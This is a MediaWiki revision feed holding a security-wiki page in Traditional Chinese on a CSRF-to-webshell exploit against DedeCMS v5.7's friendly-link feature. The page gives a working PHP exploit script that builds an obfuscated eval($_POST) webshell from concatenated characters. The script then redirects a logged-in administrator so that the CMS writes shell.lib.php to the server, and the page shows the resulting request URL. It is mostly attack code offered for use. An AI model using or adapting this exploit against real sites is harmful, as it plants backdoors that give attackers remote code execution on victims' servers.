<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=DedeCMS_v5.7_%E5%8F%8B%E6%83%85%E9%8F%88%E6%8E%A5CSRF_GetShell%E6%BC%8F%E6%B4%9E%2Fzh-tw</id>
	<title>DedeCMS v5.7 友情鏈接CSRF GetShell漏洞/zh-tw - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=DedeCMS_v5.7_%E5%8F%8B%E6%83%85%E9%8F%88%E6%8E%A5CSRF_GetShell%E6%BC%8F%E6%B4%9E%2Fzh-tw"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=DedeCMS_v5.7_%E5%8F%8B%E6%83%85%E9%8F%88%E6%8E%A5CSRF_GetShell%E6%BC%8F%E6%B4%9E/zh-tw&amp;action=history"/>
	<updated>2026-04-14T18:26:36Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=DedeCMS_v5.7_%E5%8F%8B%E6%83%85%E9%8F%88%E6%8E%A5CSRF_GetShell%E6%BC%8F%E6%B4%9E/zh-tw&amp;diff=5852&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;code&gt;dedecms_csrf.php&lt;/code&gt; 的內容如下：&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=DedeCMS_v5.7_%E5%8F%8B%E6%83%85%E9%8F%88%E6%8E%A5CSRF_GetShell%E6%BC%8F%E6%B4%9E/zh-tw&amp;diff=5852&amp;oldid=prev"/>
		<updated>2021-06-24T03:40:06Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;code&amp;gt;dedecms_csrf.php&amp;lt;/code&amp;gt; 的內容如下：&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages  /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
&lt;br /&gt;
[[File:Apply.png |700px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Edit.png |700px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;dedecms_csrf.php&amp;lt;/code&amp;gt; 的內容如下：&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
$referer = $_SERVER['HTTP_REFERER'];&lt;br /&gt;
$dede_login = str_replace(&amp;quot;friendlink_main.php&amp;quot;,&amp;quot;&amp;quot;,$referer);//去掉friendlink_main.php，取得dede后台的路径&lt;br /&gt;
$muma = '&amp;lt;'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'c'.'\''.']'.')'.';'.'?'.'&amp;gt;';&lt;br /&gt;
$exp = 'tpl.php?action=savetagfile&amp;amp;actiondo=addnewtag&amp;amp;content='. $muma .'&amp;amp;filename=shell.lib.php';&lt;br /&gt;
$url = $dede_login.$exp;&lt;br /&gt;
header(&amp;quot;location: &amp;quot;.$url);&lt;br /&gt;
exit();&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
管理員：&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Link_list.png |700px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
由於友鏈中使用了header 跳轉，所以結果其實是訪問了&amp;lt;pre&amp;gt;http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&amp;amp;actiondo=addnewtag&amp;amp;content=%3C?@eval($_POST[%27c%27]);?%3E&amp;amp;filename=shell.lib.php&amp;lt;/pre&amp;gt; 請求。&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
shell.lib.php:&lt;br /&gt;
&lt;br /&gt;
[[File:Shell.png |500px]]&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>